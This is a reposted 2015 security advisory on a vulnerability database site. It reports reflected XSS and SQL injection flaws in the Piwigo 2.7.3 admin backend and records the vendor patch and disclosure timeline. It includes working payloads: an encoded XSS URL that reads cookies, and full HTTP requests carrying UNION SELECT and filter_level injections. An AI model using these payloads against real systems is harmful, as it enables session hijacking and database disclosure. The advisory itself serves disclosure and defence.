Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Piwigo 2.7.3 Cross Site Scripting / SQL Injection Vulnerabilities

🗓️ 18 Feb 2015 00:00:00Reported by Steffen RösemannType 
zdt
 zdt🔗 0day.today👁 22 Views

Piwigo 2.7.3 XSS and SQL Injection Vulnerabilitie

Code
Reflecting XSS- and SQL Injection vulnerability in CMS Piwigo <= v. 2.7.3
Author: Steffen Rösemann
Affected Software: CMS Piwigo <= v. 2.7.3 (Release date: 9th January 2015)
Vendor URL: http://piwigo.org
Vendor Status: patched
CVE-ID: -

==========================
Vulnerability Description:
==========================

Piwigo <= v. 2.7.3 suffers from a reflecting XSS and a SQL injection in its
administrative backend.

==================
Technical Details:
==================

The reflecting XSS vulnerability resides in the "page" parameter used in
the file admin.php which can be found in the administrative backend located
here in a common Piwigo installation:

http://{TARGET}/admin.php?page=plugin-AdminTools

Exploit-Example:

http://
{TARGET}/admin.php?page=plugin-AdminTools%3Cimg%20src=n%20onerror=eval%28String.fromCharCode%2897,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59%29%29%20%3E

The SQL injection vulnerability can as well be found in the administrative
backend and can be found in the "History" functionality located here:

http://{TARGET}/admin.php?page=history

The SQL injection vulnerability can be exploited by appending arbitrary SQL
statements in a POST request to the parameter "user":

Exploit-Example:

POST /piwigo/admin.php?page=history HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101
Firefox/31.0 Iceweasel/31.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/piwigo/admin.php?page=history&search_id=82
Cookie: pwg_display_thumbnail=no_display_thumbnail;
pwg_id=19rpao6bhdsn3l0u0o1im4m680;
_pk_id.1.1fff=7588ea02f4577539.1420720532.1.1420720532.1420720532.
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 255

start=2015-01-08+&end=2015-01-09+&types%5B%5D=none&types%5B%5D=picture&types%5B%5D=high&types%5B%5D=other&user=2)
AND 1=2 UNION SELECT user(),database(),3,version(),5,6,7,8,9 --
&image_id=&filename=&ip=&display_thumbnail=no_display_thumbnail&submit=Submit

-------------------------------

When an authenticated user is navigating to "Photos/Batch Manager" he is able to apply different filters. When all filters are activated and the button "Refresh photo set" is executed, the following POST request is sent to the server:



POST /piwigo-2.7.3/piwigo/admin.php?page=batch_manager HTTP/1.1
Host: <IP>
Content-Type: application/x-www-form-urlencoded
Cookie: pwg_id=ri5ra17df1v20b0h51liekceu1; interface_language=s%3A2%3A%22en%22%3B

filter_category_use=on&filter_level=1'&filter_level_include_lower=on&filter_dimension_min_width=600&filter_filesize_use=on&regenerateSuccess=0&filter_search_use=on&author=Type+the+author+name+here&filter_prefilter=caddie&title=Type+the+title+here&filter_dimension_min_ratio=1.25&level=4&tag_mode=OR&filter_prefilter_use=on&regenerateError=0&filter_filesize_min=0&filter_duplicates_date=on&remove_date_creation=on&date_creation=2015-02-06+00%3a00%3a00&submitFilter=Refresh+photo+set&filter_dimension_max_height=2300&filter_category_recursive=on&remove_title=on&filter_tags_use=on&filter_filesize_max=15.1&filter_dimension_max_width=3500&filter_dimension_max_ratio=1.78&selectAction=------------------&filter_dimension_use=on&remove_author=on&filter_duplicates_dimensions=on&start=0&filter_level_use=on&[email protected]&confirm_deletion=on&filter_dimension_min_height=480


This POST request is prone to boolean-based blind, error-based and AND/OR time-based blind SQL injection in the parameter filter_level. When adding a single quote a database error message can be provoked. 

=========
Solution:
=========

Install the latest version 2.7.4 (released 17th February 2015).


====================
Disclosure Timeline:
====================
08-Jan-2015 – found the vulnerability
09-Jan-2015 - informed the developers
09-Jan-2015 – release date of this security advisory [without technical
details]
09-Jan-2015 - vendor responded, will work on a patch (released in v. 2.7.4)
17-Feb-2015 - vendor releases patch 2.7.4 (see [3])
17-Feb-2015 - release date of this security advisory
17-Feb-2015 - send to FullDisclosure

========
Credits:
========

Vulnerability found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] http://piwigo.org
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-06.html
[3] http://piwigo.org/forum/viewtopic.php?id=25179

#  0day.today [2018-01-10]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Feb 2015 00:00Current
7.9High risk
Vulners AI Score7.9
piwigocross site scriptingsql injectionadministrative backendpatchedcveexploitpost requestvendor urlsolutionhistory functionalityuser input
22